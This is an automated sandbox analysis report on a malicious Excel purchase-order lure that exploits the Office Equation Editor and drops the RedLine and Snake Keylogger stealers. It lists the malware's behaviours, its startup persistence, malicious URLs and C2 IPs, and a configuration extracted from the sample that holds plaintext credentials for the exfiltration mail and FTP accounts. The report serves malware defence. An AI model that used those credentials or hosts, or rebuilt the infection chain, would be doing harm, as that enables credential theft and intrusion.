Windows Analysis Report
Orden de compra 0001-00255454.xlam.xlsx

Overview

General Information

Sample name: Orden de compra 0001-00255454.xlam.xlsx
Analysis ID: 1436299
MD5: a2e67a3d40ebd7f8872ebb1dda01aba9
SHA1: 27feddfa7d771ff519757beaac8c974330e14e1d
SHA256: 5242cb2077f21596ec657daf5b6c45087259b85708f959f22b2490d1a381dd36
Tags: xlamxlsx

Detection

PureLog Stealer, RedLine, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Snake Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
Binary is likely a compiled AutoIt script file
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Installs new ROOT certificates
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: Orden de compra 0001-00255454.xlam.xlsx Avira: detected
Source: https://scratchdreams.tk Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk/_send_.php?TS Avira URL Cloud: Label: malware
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "FTP Server": "ftp://ftp.antoniomayol.com/", "FTP Username": "johnson@antoniomayol.com", "Password": "DAIpro123**", "Username": "contabilidad@daipro.com.mx", "Host": "mail.daipro.com.mx", "Port": "587"}
Source: https://scratchdreams.tk Virustotal: Detection: 18%
Source: https://scratchdreams.tk/_send_.php?TS Virustotal: Detection: 16%
Source: Orden de compra 0001-00255454.xlam.xlsx Virustotal: Detection: 55%
Source: Orden de compra 0001-00255454.xlam.xlsx ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Roaming\negrett.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\directory\name.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe Joe Sandbox ML: detected

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 38.242.255.115 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 38.242.255.115 Port: 443
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\negrett.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 38.242.255.115:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: Binary string: _.pdb source: RegSvcs.exe, 00000009.00000002.887613272.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: name.exe, 00000008.00000003.776938516.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.777173422.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.811942051.00000000011D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.813355111.0000000002B70000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 5_2_00B7DBBE
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B4C2A2 FindFirstFileExW, 5_2_00B4C2A2
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B868EE FindFirstFileW,FindClose, 5_2_00B868EE
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 5_2_00B8698F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0105DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 8_2_0105DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0102C2A2 FindFirstFileExW, 8_2_0102C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0106698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 8_2_0106698F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_010668EE FindFirstFileW,FindClose, 8_2_010668EE
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0105D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_0105D076
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0105D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_0105D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0106979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_0106979D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01069642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_01069642
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01069B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 8_2_01069B2B
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01065C97 FindFirstFileW,FindNextFileW,FindClose, 8_2_01065C97
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0139DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 11_2_0139DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0136C2A2 FindFirstFileExW, 11_2_0136C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 11_2_013A698F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013A68EE FindFirstFileW,FindClose, 11_2_013A68EE
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0139D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_0139D076
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0139D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_0139D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_013A979D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_013A9642
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 11_2_013A9B2B
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013A5C97 FindFirstFileW,FindNextFileW,FindClose, 11_2_013A5C97
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_035306F5 WinExec,ExitProcess, 2_2_035306F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03530715 ExitProcess, 2_2_03530715
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03530631 LoadLibraryW, 2_2_03530631
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_035306AA URLDownloadToFileW, 2_2_035306AA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0353064B URLDownloadToFileW, 2_2_0353064B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 9_2_003DDC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00A87110h 9_2_00A86CF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00A86B19h 9_2_00A86858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00A84CA5h 9_2_00A84AB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00A8562Fh 9_2_00A84AB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00A85999h 9_2_00A856D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 9_2_00A83FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00A87110h 9_2_00A86CE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00A87110h 9_2_00A8703F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00A8F979h 9_2_00A8F6D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00A8F0C9h 9_2_00A8EE21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00A8F521h 9_2_00A8F279
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00A86259h 9_2_00A85FA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00A866B9h 9_2_00A863F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00A8FDD1h 9_2_00A8FB29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00A85DF9h 9_2_00A85B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D24869h 9_2_00D245C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D20B99h 9_2_00D208F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D218A1h 9_2_00D215F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D2A18Ah 9_2_00D29EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D2AE91h 9_2_00D2ABE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D2AA39h 9_2_00D2A790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D20741h 9_2_00D20498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D2B7D5h 9_2_00D2B498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D22E59h 9_2_00D22BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D29459h 9_2_00D291B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D23B61h 9_2_00D238B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D21449h 9_2_00D211A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D22151h 9_2_00D21EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D28751h 9_2_00D284A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D21CF9h 9_2_00D21A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D22A01h 9_2_00D22758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 9_2_00D26258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D29001h 9_2_00D28D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D202E9h 9_2_00D20040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D2B2E9h 9_2_00D2B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 9_2_00D2624A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D20FF1h 9_2_00D20D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D23709h 9_2_00D23460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D29D09h 9_2_00D29A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D24411h 9_2_00D24168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D23FB9h 9_2_00D23D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D225A9h 9_2_00D22300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D28BA9h 9_2_00D28900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D232B1h 9_2_00D23008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D298B1h 9_2_00D29608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D2A5E1h 9_2_00D2A338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00D282D1h 9_2_00D28028
Source: global traffic DNS query: name: baitalasma.com
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic TCP traffic: 38.242.255.115:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic TCP traffic: 38.242.255.115:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 38.242.255.115:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
